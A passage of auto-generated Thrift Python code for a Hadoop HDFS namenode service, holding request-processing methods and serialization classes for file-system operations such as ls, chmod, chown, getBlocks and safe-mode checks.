def process_ls(self, seqid, iprot, oprot):
args = ls_args()
args.read(iprot)
iprot.readMessageEnd()
result = ls_result()
try:
result.success = self._handler.ls(args.ctx, args.path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("ls", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_mkdirhier(self, seqid, iprot, oprot):
args = mkdirhier_args()
args.read(iprot)
iprot.readMessageEnd()
result = mkdirhier_result()
try:
result.success = self._handler.mkdirhier(args.ctx, args.path, args.perms)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("mkdirhier", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_refreshNodes(self, seqid, iprot, oprot):
args = refreshNodes_args()
args.read(iprot)
iprot.readMessageEnd()
result = refreshNodes_result()
try:
self._handler.refreshNodes(args.ctx)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("refreshNodes", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_rename(self, seqid, iprot, oprot):
args = rename_args()
args.read(iprot)
iprot.readMessageEnd()
result = rename_result()
try:
result.success = self._handler.rename(args.ctx, args.path, args.newPath)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("rename", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_reportBadBlocks(self, seqid, iprot, oprot):
args = reportBadBlocks_args()
args.read(iprot)
iprot.readMessageEnd()
result = reportBadBlocks_result()
try:
self._handler.reportBadBlocks(args.ctx, args.blocks)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("reportBadBlocks", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_stat(self, seqid, iprot, oprot):
args = stat_args()
args.read(iprot)
iprot.readMessageEnd()
result = stat_result()
try:
result.success = self._handler.stat(args.ctx, args.path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("stat", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getContentSummary(self, seqid, iprot, oprot):
args = getContentSummary_args()
args.read(iprot)
iprot.readMessageEnd()
result = getContentSummary_result()
try:
result.success = self._handler.getContentSummary(args.ctx, args.Path)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getContentSummary", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_multiGetContentSummary(self, seqid, iprot, oprot):
args = multiGetContentSummary_args()
args.read(iprot)
iprot.readMessageEnd()
result = multiGetContentSummary_result()
try:
result.success = self._handler.multiGetContentSummary(args.ctx, args.paths)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("multiGetContentSummary", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_setQuota(self, seqid, iprot, oprot):
args = setQuota_args()
args.read(iprot)
iprot.readMessageEnd()
result = setQuota_result()
try:
self._handler.setQuota(args.ctx, args.path, args.namespaceQuota, args.diskspaceQuota)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("setQuota", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_setReplication(self, seqid, iprot, oprot):
args = setReplication_args()
args.read(iprot)
iprot.readMessageEnd()
result = setReplication_result()
try:
result.success = self._handler.setReplication(args.ctx, args.path, args.replication)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("setReplication", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_unlink(self, seqid, iprot, oprot):
args = unlink_args()
args.read(iprot)
iprot.readMessageEnd()
result = unlink_result()
try:
result.success = self._handler.unlink(args.ctx, args.path, args.recursive)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("unlink", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_utime(self, seqid, iprot, oprot):
args = utime_args()
args.read(iprot)
iprot.readMessageEnd()
result = utime_result()
try:
self._handler.utime(args.ctx, args.path, args.atime, args.mtime)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("utime", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_datanodeUp(self, seqid, iprot, oprot):
args = datanodeUp_args()
args.read(iprot)
iprot.readMessageEnd()
result = datanodeUp_result()
self._handler.datanodeUp(args.name, args.storage, args.thriftPort)
oprot.writeMessageBegin("datanodeUp", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_datanodeDown(self, seqid, iprot, oprot):
args = datanodeDown_args()
args.read(iprot)
iprot.readMessageEnd()
result = datanodeDown_result()
self._handler.datanodeDown(args.name, args.storage, args.thriftPort)
oprot.writeMessageBegin("datanodeDown", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getDelegationToken(self, seqid, iprot, oprot):
args = getDelegationToken_args()
args.read(iprot)
iprot.readMessageEnd()
result = getDelegationToken_result()
try:
result.success = self._handler.getDelegationToken(args.ctx, args.renewer)
except hadoop.api.common.ttypes.IOException, err:
result.err = err
oprot.writeMessageBegin("getDelegationToken", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class chmod_args(object):
"""
Attributes:
- ctx
- path: Path of the file or directory.
- perms: New permissions for the file or directory.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.I16, 'perms', None, None, ), # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, perms=None,):
self.ctx = ctx
self.path = path
self.perms = perms
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I16:
self.perms = iprot.readI16();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('chmod_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.perms is not None:
oprot.writeFieldBegin('perms', TType.I16, 2)
oprot.writeI16(self.perms)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class chmod_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('chmod_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class chown_args(object):
"""
Attributes:
- ctx
- path: Path to the file or directory
- owner: New owner.
- group: New group.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.STRING, 'owner', None, None, ), # 2
(3, TType.STRING, 'group', None, None, ), # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, owner=None, group=None,):
self.ctx = ctx
self.path = path
self.owner = owner
self.group = group
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.owner = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.group = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('chown_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.owner is not None:
oprot.writeFieldBegin('owner', TType.STRING, 2)
oprot.writeString(self.owner)
oprot.writeFieldEnd()
if self.group is not None:
oprot.writeFieldBegin('group', TType.STRING, 3)
oprot.writeString(self.group)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class chown_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('chown_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class df_args(object):
"""
Attributes:
- ctx
"""
thrift_spec = (
None, # 0
None, # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None,):
self.ctx = ctx
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('df_args')
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class df_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.I64,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype10, _size7) = iprot.readListBegin()
for _i11 in xrange(_size7):
_elem12 = iprot.readI64();
self.success.append(_elem12)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('df_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I64, len(self.success))
for iter13 in self.success:
oprot.writeI64(iter13)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class enterSafeMode_args(object):
"""
Attributes:
- ctx
"""
thrift_spec = (
None, # 0
None, # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None,):
self.ctx = ctx
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('enterSafeMode_args')
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class enterSafeMode_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('enterSafeMode_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getBlocks_args(object):
"""
Attributes:
- ctx
- path: Path to the file.
- offset: Offset of the region.
- length: Length of the region
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.I64, 'offset', None, None, ), # 2
(3, TType.I64, 'length', None, None, ), # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, offset=None, length=None,):
self.ctx = ctx
self.path = path
self.offset = offset
self.length = length
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.offset = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.length = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getBlocks_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.offset is not None:
oprot.writeFieldBegin('offset', TType.I64, 2)
oprot.writeI64(self.offset)
oprot.writeFieldEnd()
if self.length is not None:
oprot.writeFieldBegin('length', TType.I64, 3)
oprot.writeI64(self.length)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getBlocks_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Block, Block.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype17, _size14) = iprot.readListBegin()
for _i18 in xrange(_size14):
_elem19 = Block()
_elem19.read(iprot)
self.success.append(_elem19)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getBlocks_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter20 in self.success:
iter20.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getPreferredBlockSize_args(object):
"""
Attributes:
- ctx
- path: Path to the file.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None,):
self.ctx = ctx
self.path = path
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getPreferredBlockSize_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getPreferredBlockSize_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getPreferredBlockSize_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class isInSafeMode_args(object):
"""
Attributes:
- ctx
"""
thrift_spec = (
None, # 0
None, # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None,):
self.ctx = ctx
def read(self, iprot):
